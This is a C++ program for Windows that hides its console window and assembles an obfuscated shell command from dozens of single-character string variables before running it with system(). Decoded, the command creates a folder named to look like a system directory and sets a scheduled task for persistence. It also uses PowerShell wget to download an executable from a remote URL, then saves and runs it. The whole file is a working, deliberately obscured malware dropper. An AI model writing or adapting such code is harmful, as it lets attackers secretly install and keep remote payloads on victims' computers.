#include <iostream>
#include <windows.h>
#include <string>
int main(int argc, char *argv[])
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
std::string dVNDqYuQgUsERriYyCqUVzCVaiiLNLOckKWo = "A";
std::string dJrhlJkGnkAvpkmuNbXnyGtl = "B";
std::string aMEBcFCqtibmxtsV = "C";
std::string BhuCTyvtRXSQEnciJPDBoqaDWgnbQbgSVB = "D";
std::string pnAkUcDPEMy = "E";
std::string JlnbHPJaWFgVrsLpVSjBkqFsZe = "F";
std::string suFJIHKxhikPRuwNUOEAgACTWcgdMXUemnTFABuwfQNfMIT = "G";
std::string bfStcfjRBUNMYKrVciWaumP = "H";
std::string fvBaGrjOvuNcZsDUY = "I";
std::string VKDLxAbQqjGmzNJKrxoXmiDEcvgNlmQwRTW = "J";
std::string MzbjsirqNuaaNSaheOIwJnxZsxXBHexguyzq = "K";
std::string RtxZFiWGVHwFNFSbnQtiGJOkc = "L";
std::string xthYKRhpDfGQmeccYhNXiqRvwKgW = "M";
std::string RJQTHrZduWzIWp = "N";
std::string WpZEqtQaxmbtyEhBFAxpSat = "O";
std::string WIcCtxNQHTGsNFzRirKoDIPOPjkyDNTJZKfnBtzNIxVYtZ = "P";
std::string hONSUcKbWJphSxEdEOGKNNP = "Q";
std::string WaFGbzwZdEBDfgTVBodlKcPHYCzK = "R";
std::string MzBlgEfBZg = "S";
std::string KsVxKItxaLpwdguocRRzbWxdyKGGzeESL = "T";
std::string CjoSJzOqA = "U";
std::string EWxWRRbtKTOOikYhpzpwNndGa = "V";
std::string AGsNWvDlgru = "W";
std::string fYqUwqBrgKaClWMakuLWEXBlD = "X";
std::string ZmHEYZUHAAYTuegqTKhQzzlPZCWKs = "Y";
std::string flSfHQKxCzEL = "Z";
std::string amxOIjPtayLqRYeXbLuCqvvelteCZJeMbw = "a";
std::string oSnGijXJ = "b";
std::string nR = "c";
std::string WWrGdWEXFtAiiWIECtRANyfamkDJBjYcmyqYudEhB = "d";
std::string oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS = "e";
std::string tPJaoy = "f";
std::string DXkWDauoIsuMaYorlG = "g";
std::string sQtqhdNOlPUXq = "h";
std::string YPGc = "i";
std::string JDillMtOfpMGbqzRgeVGHVBxmLuUMLInwRqkKguqoHpARM = "j";
std::string cuqXkCPyxMRWuCCdEbVvfYXNHEGyQDtffB = "k";
std::string ZXqxFewbFviqGcAbu = "l";
std::string US = "m";
std::string jvxOAhWvSQsNSIOjWXBYLrrvMobhsKLtE = "n";
std::string AMC = "o";
std::string pnxAWmrPzWf = "p";
std::string DRqLKocOiFyFUCjATCgPNrAhfMgIanWsmlEmtNHfXqlmxVEWP = "q";
std::string YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD = "r";
std::string j = "s";
std::string sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR = "t";
std::string koKP = "u";
std::string ARMMthlyfxkRURVjblZWBtwqQXpYFboOBcsH = "v";
std::string DsMTVcOFcwuXKInQiErwHOwkWScamxjtiFNcjDUJmOmMw = "w";
std::string lsATCJZZd = "x";
std::string xbYgdSqgNjhcyRdcfgXslwSCzSlFALWBeDhBnAfxmuFyQx = "y";
std::string uThKUOVisvksDeHzaOnvbler = "z";
std::string zULZjkagpuKJbHQzXTZDxWtFZnXoHF = "0";
std::string qpqeLkVZcv = "1";
std::string ztMdQgtLiEeIicDCECIoNikDfHX = "2";
std::string krLiyyxoKBvpWYts = "3";
std::string GEZynessTTZchQPvSyeq = "4";
std::string Zvjk = "5";
std::string RSShHfHXXiBPpwhfAsRWEHrIRXcBfeL = "6";
std::string mZqowinRtHnAiIQVdonHUyYwMWMZDPUShTQIwBvGappVspEnYf = "7";
std::string JyfQkiaxpQLWzRwxmeAJuzpLOyhNlsNJhiHzusLehGAU = "8";
std::string bVvuH = "9";
std::string iNYRJDxjA = " ";
std::string luOayosrBZrQspslLdfY = ".";
std::string QmuYIvHYjDpJfAivhBDi = "-";
std::string gsTDJogwNDRx = ">";
std::string LsXRLAivfmTwrkfJqCeFf = "<";
std::string wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP = ":";
std::string e = "'";
std::string jwNzQUfmoWIcsuZuRYqpcWgyMgZszr = "(";
std::string DHRzSqcZHTZFZTnArAkPnbWtuUimGmNMsMUsKzjsMxg = ")";
std::string DxIndQhTokN = "/";
std::string RarUAdsS = "&";
system((fYqUwqBrgKaClWMakuLWEXBlD+nR+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+iNYRJDxjA+RarUAdsS+iNYRJDxjA+nR+WWrGdWEXFtAiiWIECtRANyfamkDJBjYcmyqYudEhB+iNYRJDxjA+DxIndQhTokN+iNYRJDxjA+RarUAdsS+iNYRJDxjA+US+cuqXkCPyxMRWuCCdEbVvfYXNHEGyQDtffB+WWrGdWEXFtAiiWIECtRANyfamkDJBjYcmyqYudEhB+YPGc+YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD+iNYRJDxjA+aMEBcFCqtibmxtsV+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+MzBlgEfBZg+xbYgdSqgNjhcyRdcfgXslwSCzSlFALWBeDhBnAfxmuFyQx+j+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+US+iNYRJDxjA+RarUAdsS+iNYRJDxjA+nR+WWrGdWEXFtAiiWIECtRANyfamkDJBjYcmyqYudEhB+iNYRJDxjA+aMEBcFCqtibmxtsV+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+MzBlgEfBZg+xbYgdSqgNjhcyRdcfgXslwSCzSlFALWBeDhBnAfxmuFyQx+j+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+US+iNYRJDxjA+RarUAdsS+iNYRJDxjA+j+nR+sQtqhdNOlPUXq+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+amxOIjPtayLqRYeXbLuCqvvelteCZJeMbw+j+cuqXkCPyxMRWuCCdEbVvfYXNHEGyQDtffB+j+iNYRJDxjA+DxIndQhTokN+nR+YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+amxOIjPtayLqRYeXbLuCqvvelteCZJeMbw+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+DxIndQhTokN+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+jvxOAhWvSQsNSIOjWXBYLrrvMobhsKLtE+iNYRJDxjA+KsVxKItxaLpwdguocRRzbWxdyKGGzeESL+amxOIjPtayLqRYeXbLuCqvvelteCZJeMbw+j+cuqXkCPyxMRWuCCdEbVvfYXNHEGyQDtffB+MzBlgEfBZg+xbYgdSqgNjhcyRdcfgXslwSCzSlFALWBeDhBnAfxmuFyQx+j+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+US+iNYRJDxjA+DxIndQhTokN+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD+iNYRJDxjA+aMEBcFCqtibmxtsV+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+MzBlgEfBZg+xbYgdSqgNjhcyRdcfgXslwSCzSlFALWBeDhBnAfxmuFyQx+j+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+US+DxIndQhTokN+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dVNDqYuQgUsERriYyCqUVzCVaiiLNLOckKWo+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+DxIndQhTokN+j+nR+iNYRJDxjA+US+YPGc+jvxOAhWvSQsNSIOjWXBYLrrvMobhsKLtE+koKP+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+DxIndQhTokN+US+AMC+iNYRJDxjA+Zvjk+iNYRJDxjA+DxIndQhTokN+tPJaoy+iNYRJDxjA+RarUAdsS+iNYRJDxjA+pnxAWmrPzWf+AMC+DsMTVcOFcwuXKInQiErwHOwkWScamxjtiFNcjDUJmOmMw+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD+j+sQtqhdNOlPUXq+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+ZXqxFewbFviqGcAbu+ZXqxFewbFviqGcAbu+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+jwNzQUfmoWIcsuZuRYqpcWgyMgZszr+DsMTVcOFcwuXKInQiErwHOwkWScamxjtiFNcjDUJmOmMw+DXkWDauoIsuMaYorlG+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+iNYRJDxjA+e+sQtqhdNOlPUXq+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+pnxAWmrPzWf+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+DxIndQhTokN+DxIndQhTokN+j+j+j+DxIndQhTokN+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dVNDqYuQgUsERriYyCqUVzCVaiiLNLOckKWo+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+e+iNYRJDxjA+QmuYIvHYjDpJfAivhBDi+WpZEqtQaxmbtyEhBFAxpSat+koKP+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+JlnbHPJaWFgVrsLpVSjBkqFsZe+YPGc+ZXqxFewbFviqGcAbu+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dVNDqYuQgUsERriYyCqUVzCVaiiLNLOckKWo+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+DHRzSqcZHTZFZTnArAkPnbWtuUimGmNMsMUsKzjsMxg+iNYRJDxjA+RarUAdsS+iNYRJDxjA+pnxAWmrPzWf+AMC+DsMTVcOFcwuXKInQiErwHOwkWScamxjtiFNcjDUJmOmMw+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+YbjnWaTCCbdmqaNowSHabeHJAslbazkXbD+j+sQtqhdNOlPUXq+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+ZXqxFewbFviqGcAbu+ZXqxFewbFviqGcAbu+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+jwNzQUfmoWIcsuZuRYqpcWgyMgZszr+DsMTVcOFcwuXKInQiErwHOwkWScamxjtiFNcjDUJmOmMw+DXkWDauoIsuMaYorlG+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+iNYRJDxjA+e+sQtqhdNOlPUXq+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+pnxAWmrPzWf+wTVjrSIhRwybEHPhvRpIyzrOhkTSVziKnGOHpwHMiWXeqNP+DxIndQhTokN+DxIndQhTokN+j+j+j+DxIndQhTokN+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dJrhlJkGnkAvpkmuNbXnyGtl+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+e+iNYRJDxjA+QmuYIvHYjDpJfAivhBDi+WpZEqtQaxmbtyEhBFAxpSat+koKP+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR+JlnbHPJaWFgVrsLpVSjBkqFsZe+YPGc+ZXqxFewbFviqGcAbu+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dJrhlJkGnkAvpkmuNbXnyGtl+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+DHRzSqcZHTZFZTnArAkPnbWtuUimGmNMsMUsKzjsMxg+iNYRJDxjA+RarUAdsS+iNYRJDxjA+JlnbHPJaWFgVrsLpVSjBkqFsZe+fvBaGrjOvuNcZsDUY+RtxZFiWGVHwFNFSbnQtiGJOkc+pnAkUcDPEMy+dVNDqYuQgUsERriYyCqUVzCVaiiLNLOckKWo+luOayosrBZrQspslLdfY+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+iNYRJDxjA+RarUAdsS+iNYRJDxjA+oxrNVxPZcFZlmnadZfivUGZEQVSKwYcFNS+lsATCJZZd+YPGc+sQyxjYLRzczkYxDGVwsQgoybGoigWyrLSgfUYtfR).c_str());
return 0;
}